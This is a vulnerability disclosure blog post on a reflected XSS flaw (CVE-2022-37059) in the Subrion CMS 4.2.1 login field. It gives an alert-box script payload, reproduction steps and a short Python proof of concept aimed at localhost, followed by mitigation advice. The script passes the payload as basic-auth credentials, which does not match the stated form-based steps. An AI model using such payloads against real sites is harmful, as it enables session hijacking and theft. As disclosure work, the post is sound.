Post

CVE-2022-37059 - Cross-Site Scripting (XSS) Vulnerability in Subrion CMS v4.2.1

Posted
By RashidKhan Pathan 2 min read

Description: This writeup highlights the discovery and exploitation of a reflected Cross-Site Scripting (XSS) vulnerability in the login field of Subrion CMS v4.2.1. The exploit allows an attacker to inject malicious code, leading to the execution of arbitrary scripts in the context of an authenticated user.

Introduction: Subrion CMS, a widely-used content management system, has been identified with a critical security flaw in version 4.2.1, exposing a reflected XSS vulnerability. This writeup elucidates the steps to reproduce the exploit and provides an overview of the discovered weakness

Discovery: The vulnerability was discovered in the login field of Subrion CMS v4.2.1, where an attacker could inject malicious scripts. By crafting a specially designed payload, the attacker successfully demonstrated the execution of arbitrary code upon login. The payload used for this exploit was:

1

ehxxt<script>alert(1)</script>fukq

Steps to Reproduce:

  1. Navigate to the vulnerable URL: http://localhost/subrioncms/panel/
  2. Copy and paste the crafted payload into the login field.
  3. Enter any password and click the login button.
  4. Observe the execution of the payload, triggering an alert.

Exploit Code: The provided Python script automates the exploitation process. The script utilizes the requests library to send a crafted request to the vulnerable login endpoint. Upon execution, the payload triggers the XSS vulnerability, showcasing its potential impact.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

import requests

class Exploit:
    def print_exploit_info(self):
        print("[+] Cross-Site Scripting in Admin Panel of Subrion CMS 4.2.1")
        print("[+] Author: RashidKhan Pathan")
        print("[+] CVE-2022-37059")
        print("[+] Tested on: Windows 10, Kali Linux")

    def XSS_Exploit(self):
        response = requests.get(
            "http://localhost/subrioncms/panel/", auth=("ehxxt<script>alert(1)</script>fukq", "anypassword"))
        print(response.content)

# Instantiate the Exploit class and execute the exploit
exploit = Exploit()
exploit.print_exploit_info()
exploit.XSS_Exploit()

Impact: The exploitation of this XSS vulnerability enables attackers to inject and execute arbitrary scripts within the context of authenticated users. This could lead to various malicious activities, such as stealing sensitive information, session hijacking, or defacement of the CMS interface.

Mitigation: To address this security flaw, users are strongly advised to update their Subrion CMS installations to the latest version, where the vulnerability has been patched. Additionally, security measures such as input validation and output encoding should be implemented to prevent similar XSS attacks in web applications.

Conclusion: The identification and disclosure of the XSS vulnerability in Subrion CMS v4.2.1 underscore the critical importance of ongoing security assessments and prompt updates. The collaboration between security researchers and CMS developers remains crucial to maintaining a secure online environment for users and businesses alike.

Windows
exploit writing Web Exploitation 0Day
This post is licensed under CC BY 4.0 by the author.